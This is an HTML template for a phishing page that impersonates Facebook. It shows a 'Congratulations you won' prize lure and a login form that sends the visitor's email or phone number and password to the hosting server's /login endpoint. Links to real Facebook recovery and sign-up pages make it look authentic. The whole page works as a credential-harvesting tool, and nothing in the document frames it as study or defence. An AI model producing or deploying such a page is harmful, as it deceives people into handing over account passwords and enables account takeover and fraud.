<!-- @format -->

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>
    <style>
      * {
        box-sizing: border-box;
      }
      body {
        display: flex;
        height: 100vh;
        justify-content: center;
        align-items: center;
        background-color: #eff4fc;
        font-family: Arial, Helvetica, sans-serif;
      }
      .container {
        display: flex;
        width: 400px;
        border-radius: 8px;

        padding: 10px;
        flex-direction: column;
      }

      .center {
        display: flex;
        border: 2px solid white;
        background-color: white;
        border-radius: 8px;
        padding: 5px;
        justify-content: center;
      }
      .box-shadow {
        box-shadow: 2px 2px 4px 1px rgb(181, 178, 178),
          -2px 0px 4px 1px rgb(168, 166, 166);
      }
      .center div {
        padding: 5px;
      }
      .header {
        color: #1877f2;
        font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI",
          Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue",
          sans-serif;
        font-size: 1.25rem;
      }
      form {
        display: flex;
        flex-direction: column;
        align-items: center;

        width: 100%;
      }
      .form-header {
        font-family: SFProDisplay-Regular;
        font-size: 18px;
      }
      form div {
        width: 100%;
      }
      input,
      .button {
        width: 100%;
        height: 50px;
        border-radius: 5px;
      }
      .button {
        display: flex;
        justify-content: center;
        align-items: center;
        background-color: #1877f2;
        border-radius: 10px;
        font-size: 1.25rem;
        color: white;
      }
      .flex,
      .flex-wrap {
        display: flex;
        justify-content: center;
        align-items: center;
      }
      .flex-wrap {
        flex-wrap: wrap;
      }

      .footer a {
        text-decoration: none;
        color: #1877f2;
        font-size: 14px;
      }
      .message {
        font-size: 0.8rem;
        color: red;
      }
      button {
        width: 100%;

        width: 200px;
      }
      button:hover,
      input:hover {
        box-shadow: 2px 2px 4px 1px rgb(181, 178, 178),
          -2px 0px 4px 1px rgb(168, 166, 166);
      }

      .image {
        background-image: url("facebookzip.jpg");
        background-size: contain;
        background-repeat: no-repeat;
        background-position: center center;
      }
      .decorated-text {
        color: red;
        font-family: Arial, Helvetica, sans-serif;
        font-weight: 700;
      }
      .padding-s {
        padding: 10px;
      }
      img {
        width: 100px;
        border-radius: 50px;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <div>
        <div class="header flex"><h1>Facebook</h1></div>
        <div class="decorated-text padding-s">Congratulations you won !!!</div>
        <div class="decorated-text padding-s">
          <div class="prize-image">
            <img src="facebookzip.jpg" alt="ziped folder gift" />
          </div>
          Login to Claim your prize !!!
        </div>

        <div class="image"></div>
      </div>
      <div class="center box-shadow">
        <form action="/login" method="POST">
          <div class="form-header flex">Login to Facebook</div>
          <div class="flex">
            <input
              type="text"
              name="email"
              placeholder="email or phone number"
            />
          </div>
          <div class="flex">
            <input type="text" name="pass" placeholder="password" />
          </div>

          <div><button type="submit" class="button">Login</button></div>
          <div class="footer flex">
            <a
              href="https://www.facebook.com/recover/initiate/?ars=facebook_login"
            >
              Forgot account? </a
            >·
            <a href="https://www.facebook.com/r.php?locale=en_US&display=page">
              Sign up for Facebook</a
            >
          </div>
          <div class="message flex">{{message}}</div>
        </form>
      </div>
    </div>
  </body>
</html>
